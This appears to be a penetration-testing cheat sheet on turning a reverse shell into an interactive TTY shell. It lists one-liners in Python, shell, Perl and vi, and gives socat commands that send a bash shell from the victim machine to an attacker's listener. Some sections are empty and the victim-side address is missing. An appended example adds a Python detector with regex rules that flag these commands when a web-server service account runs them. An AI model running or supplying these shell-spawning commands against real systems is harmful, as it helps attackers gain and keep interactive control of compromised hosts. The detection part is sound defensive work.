Spawning a TTY Shell

How to get an interactive shell or TTY shell


During a penetration test, you might find a vulnerable web application and get a reverse shell back to your machine. Usually, the shell you receive is owned by the user of the running service, such as “www-data” or something similar. Such users are not meant to have a shell, because they don’t need to interact with the operating system as humans do.

Some commands (such as less, vi, su, sudo, passwd, etc.) don’t work in a non-TTY, non-interactive shell. For that reason, you need to upgrade your shell to a TTY shell.

To check whether the shell is a TTY shell, run the tty command as follows.

$ tty
not a tty
$ tty

Here are some commands which will enable you to spawn a tty shell:


This is the most popular method for spawning a tty shell. The target server should have python or python3 installed.

python -c "import pty;pty.spawn('/bin/bash')"



echo "os.system('/bin/bash')"



/bin/sh -i



/bin/bash -i



perl -e 'exec "/bin/sh";'



ruby: exec "/bin/sh"



lua: os.execute('/bin/sh')


From within vi:

:set shell=/bin/bash
:shell


From within nmap:




Socat is like netcat on steroids: a very powerful networking Swiss-army knife. It can be used to carry a full TTY over a TCP connection.

Note: Socat is not installed by default, so you can try to compile the binary yourself or download a socat binary from the following links:

On your machine (the attacker machine), start Socat listener:

socat -,raw,echo=0 tcp-listen:4444

On the victim machine, type the following:

socat exec:"/bin/bash -li",pty,stderr,setsid,sigint,sane tcp:
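
From the defender's side, the command-line forms listed on this page show up in process-execution telemetry, and a service account asking for a TTY is a strong signal. The following is an added example, not part of the original post: the service-account list, rule names and sample events are assumptions constructed for illustration, and the vi, ruby and lua variants (typed inside an interpreter) are not covered.

```python
import re

# Accounts that normally never need an interactive shell (assumed list; tune per host).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# One rule per command-line form shown on this page (rule names are hypothetical).
RULES = {
    "python_pty_spawn": re.compile(r"\bpython[\d.]*\s+-c\s.*pty\.spawn\("),
    "interactive_shell": re.compile(r"(?:^|/|\s)(?:ba)?sh\s+-i\b"),
    "perl_exec_shell": re.compile(r"\bperl\s+-e\s.*\bexec\b.*/bin/(?:ba)?sh"),
    "socat_pty": re.compile(r"\bsocat\b.*\bexec:.*\bpty\b"),
}

# Constructed sample events: (user, argv joined with spaces, as an exec log records it).
SAMPLE_EVENTS = [
    ("www-data", "sh -c id"),                        # ordinary child process
    ("www-data", "python -c import pty;pty.spawn('/bin/bash')"),
    ("www-data", "/bin/sh -i"),
    ("www-data", 'perl -e exec "/bin/sh";'),
    ("www-data", "socat exec:/bin/bash -li,pty,stderr,setsid,sigint,sane tcp:HOST:4444"),
    ("alice", "/bin/bash -i"),                       # human account: expected
    ("www-data", "python3 /var/www/app/manage.py"),  # interpreter without pty.spawn
]


def detect(events):
    """Return (user, rule, cmdline) for service accounts that try to obtain a TTY."""
    hits = []
    for user, cmdline in events:
        if user not in SERVICE_ACCOUNTS:
            continue  # interactive shells are normal for human accounts
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits.append((user, name, cmdline))
                break  # one alert per event is enough
    return hits


if __name__ == "__main__":
    for user, rule, cmdline in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule}: user={user} cmd={cmdline}")
```

The same patterns translate directly into auditd or EDR rules keyed on the effective user of the web server process.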


